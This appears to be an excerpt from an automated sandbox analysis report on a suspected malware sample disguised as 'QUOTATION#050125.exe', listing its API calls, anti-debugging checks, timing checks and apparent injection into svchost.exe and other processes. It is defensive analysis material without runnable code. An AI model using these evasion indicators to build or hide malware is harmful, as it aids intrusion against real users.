Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F68EE FindFirstFileW,FindClose,	0_2_004F68EE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_004F698F
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004ED076
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004ED3A9
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004F9642
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004F979D
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_004F9B2B
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004EDBBE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_004F5C97

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004842DE

Source: RAVCpl64.exe, 00000004.00000002.7110819949.00000000004B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: cmdkey.exe, 00000005.00000002.6079587429.000000000290D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: firefox.exe, 00000006.00000002.2923355124.0000024FED987000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387088E rdtsc

2_2_0387088E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417AD3 LdrLoadDll,

2_2_00417AD3

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004FEAA2 BlockInput,

0_2_004FEAA2

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004B2622

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004842DE

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A4CE8 mov eax, dword ptr fs:[00000030h]	0_2_004A4CE8
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_01B28880 mov eax, dword ptr fs:[00000030h]	0_2_01B28880
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_01B29F40 mov eax, dword ptr fs:[00000030h]	0_2_01B29F40
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_01B29EE0 mov eax, dword ptr fs:[00000030h]	0_2_01B29EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A390 mov eax, dword ptr fs:[00000030h]	2_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A390 mov eax, dword ptr fs:[00000030h]	2_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A390 mov eax, dword ptr fs:[00000030h]	2_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43BA mov eax, dword ptr fs:[00000030h]	2_2_038D43BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43BA mov eax, dword ptr fs:[00000030h]	2_2_038D43BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC3B0 mov eax, dword ptr fs:[00000030h]	2_2_038AC3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0382E3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0382E3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0382E3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C3C7 mov eax, dword ptr fs:[00000030h]	2_2_0382C3C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038363CB mov eax, dword ptr fs:[00000030h]	2_2_038363CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038643D0 mov ecx, dword ptr fs:[00000030h]	2_2_038643D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE3DD mov eax, dword ptr fs:[00000030h]	2_2_038BE3DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B43D5 mov eax, dword ptr fs:[00000030h]	2_2_038B43D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D630E mov eax, dword ptr fs:[00000030h]	2_2_038D630E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E310 mov eax, dword ptr fs:[00000030h]	2_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E310 mov eax, dword ptr fs:[00000030h]	2_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E310 mov eax, dword ptr fs:[00000030h]	2_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386631F mov eax, dword ptr fs:[00000030h]	2_2_0386631F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868322 mov eax, dword ptr fs:[00000030h]	2_2_03868322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868322 mov eax, dword ptr fs:[00000030h]	2_2_03868322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868322 mov eax, dword ptr fs:[00000030h]	2_2_03868322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E328 mov eax, dword ptr fs:[00000030h]	2_2_0382E328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E328 mov eax, dword ptr fs:[00000030h]	2_2_0382E328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E328 mov eax, dword ptr fs:[00000030h]	2_2_0382E328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828347 mov eax, dword ptr fs:[00000030h]	2_2_03828347
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828347 mov eax, dword ptr fs:[00000030h]	2_2_03828347
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828347 mov eax, dword ptr fs:[00000030h]	2_2_03828347
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A350 mov eax, dword ptr fs:[00000030h]	2_2_0386A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E363 mov eax, dword ptr fs:[00000030h]	2_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE372 mov eax, dword ptr fs:[00000030h]	2_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE372 mov eax, dword ptr fs:[00000030h]	2_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE372 mov eax, dword ptr fs:[00000030h]	2_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE372 mov eax, dword ptr fs:[00000030h]	2_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0371 mov eax, dword ptr fs:[00000030h]	2_2_038B0371
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0371 mov eax, dword ptr fs:[00000030h]	2_2_038B0371
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385237A mov eax, dword ptr fs:[00000030h]	2_2_0385237A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE289 mov eax, dword ptr fs:[00000030h]	2_2_038AE289
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038542AF mov eax, dword ptr fs:[00000030h]	2_2_038542AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038542AF mov eax, dword ptr fs:[00000030h]	2_2_038542AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C2B0 mov ecx, dword ptr fs:[00000030h]	2_2_0382C2B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038382E0 mov eax, dword ptr fs:[00000030h]	2_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038382E0 mov eax, dword ptr fs:[00000030h]	2_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038382E0 mov eax, dword ptr fs:[00000030h]	2_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038382E0 mov eax, dword ptr fs:[00000030h]	2_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402F9 mov eax, dword ptr fs:[00000030h]	2_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A200 mov eax, dword ptr fs:[00000030h]	2_2_0382A200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382821B mov eax, dword ptr fs:[00000030h]	2_2_0382821B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0227 mov eax, dword ptr fs:[00000030h]	2_2_038B0227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0227 mov eax, dword ptr fs:[00000030h]	2_2_038B0227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0227 mov eax, dword ptr fs:[00000030h]	2_2_038B0227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A22B mov eax, dword ptr fs:[00000030h]	2_2_0386A22B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A22B mov eax, dword ptr fs:[00000030h]	2_2_0386A22B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A22B mov eax, dword ptr fs:[00000030h]	2_2_0386A22B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850230 mov ecx, dword ptr fs:[00000030h]	2_2_03850230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834180 mov eax, dword ptr fs:[00000030h]	2_2_03834180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834180 mov eax, dword ptr fs:[00000030h]	2_2_03834180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834180 mov eax, dword ptr fs:[00000030h]	2_2_03834180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E1A4 mov eax, dword ptr fs:[00000030h]	2_2_0386E1A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E1A4 mov eax, dword ptr fs:[00000030h]	2_2_0386E1A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038641BB mov ecx, dword ptr fs:[00000030h]	2_2_038641BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038641BB mov eax, dword ptr fs:[00000030h]	2_2_038641BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038641BB mov eax, dword ptr fs:[00000030h]	2_2_038641BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038401C0 mov eax, dword ptr fs:[00000030h]	2_2_038401C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038401C0 mov eax, dword ptr fs:[00000030h]	2_2_038401C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81EE mov eax, dword ptr fs:[00000030h]	2_2_038F81EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81EE mov eax, dword ptr fs:[00000030h]	2_2_038F81EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038281EB mov eax, dword ptr fs:[00000030h]	2_2_038281EB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038401F1 mov eax, dword ptr fs:[00000030h]	2_2_038401F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038401F1 mov eax, dword ptr fs:[00000030h]	2_2_038401F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038401F1 mov eax, dword ptr fs:[00000030h]	2_2_038401F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860118 mov eax, dword ptr fs:[00000030h]	2_2_03860118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA130 mov eax, dword ptr fs:[00000030h]	2_2_038BA130
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A147 mov eax, dword ptr fs:[00000030h]	2_2_0382A147
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A147 mov eax, dword ptr fs:[00000030h]	2_2_0382A147
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A147 mov eax, dword ptr fs:[00000030h]	2_2_0382A147
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386415F mov eax, dword ptr fs:[00000030h]	2_2_0386415F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836179 mov eax, dword ptr fs:[00000030h]	2_2_03836179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904080 mov eax, dword ptr fs:[00000030h]	2_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A093 mov ecx, dword ptr fs:[00000030h]	2_2_0382A093
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C090 mov eax, dword ptr fs:[00000030h]	2_2_0382C090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6090 mov eax, dword ptr fs:[00000030h]	2_2_038C6090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038700A5 mov eax, dword ptr fs:[00000030h]	2_2_038700A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60A0 mov eax, dword ptr fs:[00000030h]	2_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC0E0 mov ecx, dword ptr fs:[00000030h]	2_2_038BC0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F6 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838009 mov eax, dword ptr fs:[00000030h]	2_2_03838009
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872010 mov ecx, dword ptr fs:[00000030h]	2_2_03872010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860044 mov eax, dword ptr fs:[00000030h]	2_2_03860044
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6040 mov eax, dword ptr fs:[00000030h]	2_2_038B6040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836074 mov eax, dword ptr fs:[00000030h]	2_2_03836074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836074 mov eax, dword ptr fs:[00000030h]	2_2_03836074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE79D mov eax, dword ptr fs:[00000030h]	2_2_038AE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307A7 mov eax, dword ptr fs:[00000030h]	2_2_038307A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov eax, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov eax, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov eax, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov eax, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov eax, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov eax, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D47B4 mov ecx, dword ptr fs:[00000030h]	2_2_038D47B4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038CC7B0 mov eax, dword ptr fs:[00000030h]	2_2_038CC7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038CC7B0 mov eax, dword ptr fs:[00000030h]	2_2_038CC7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E7E0 mov eax, dword ptr fs:[00000030h]	2_2_0385E7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385270D mov eax, dword ptr fs:[00000030h]	2_2_0385270D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385270D mov eax, dword ptr fs:[00000030h]	2_2_0385270D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385270D mov eax, dword ptr fs:[00000030h]	2_2_0385270D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383471B mov eax, dword ptr fs:[00000030h]	2_2_0383471B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383471B mov eax, dword ptr fs:[00000030h]	2_2_0383471B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852755 mov eax, dword ptr fs:[00000030h]	2_2_03852755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852755 mov eax, dword ptr fs:[00000030h]	2_2_03852755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852755 mov eax, dword ptr fs:[00000030h]	2_2_03852755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852755 mov ecx, dword ptr fs:[00000030h]	2_2_03852755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852755 mov eax, dword ptr fs:[00000030h]	2_2_03852755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852755 mov eax, dword ptr fs:[00000030h]	2_2_03852755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A750 mov eax, dword ptr fs:[00000030h]	2_2_0386A750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE750 mov eax, dword ptr fs:[00000030h]	2_2_038DE750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842760 mov ecx, dword ptr fs:[00000030h]	2_2_03842760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860774 mov eax, dword ptr fs:[00000030h]	2_2_03860774
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834779 mov eax, dword ptr fs:[00000030h]	2_2_03834779
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834779 mov eax, dword ptr fs:[00000030h]	2_2_03834779
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680 mov eax, dword ptr fs:[00000030h]	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838690 mov eax, dword ptr fs:[00000030h]	2_2_03838690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC691 mov eax, dword ptr fs:[00000030h]	2_2_038BC691
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F86A8 mov eax, dword ptr fs:[00000030h]	2_2_038F86A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F86A8 mov eax, dword ptr fs:[00000030h]	2_2_038F86A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038306CF mov eax, dword ptr fs:[00000030h]	2_2_038306CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA6C0 mov eax, dword ptr fs:[00000030h]	2_2_038FA6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D86C2 mov eax, dword ptr fs:[00000030h]	2_2_038D86C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C66D0 mov eax, dword ptr fs:[00000030h]	2_2_038C66D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C66D0 mov eax, dword ptr fs:[00000030h]	2_2_038C66D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C6E0 mov eax, dword ptr fs:[00000030h]	2_2_0383C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038566E0 mov eax, dword ptr fs:[00000030h]	2_2_038566E0
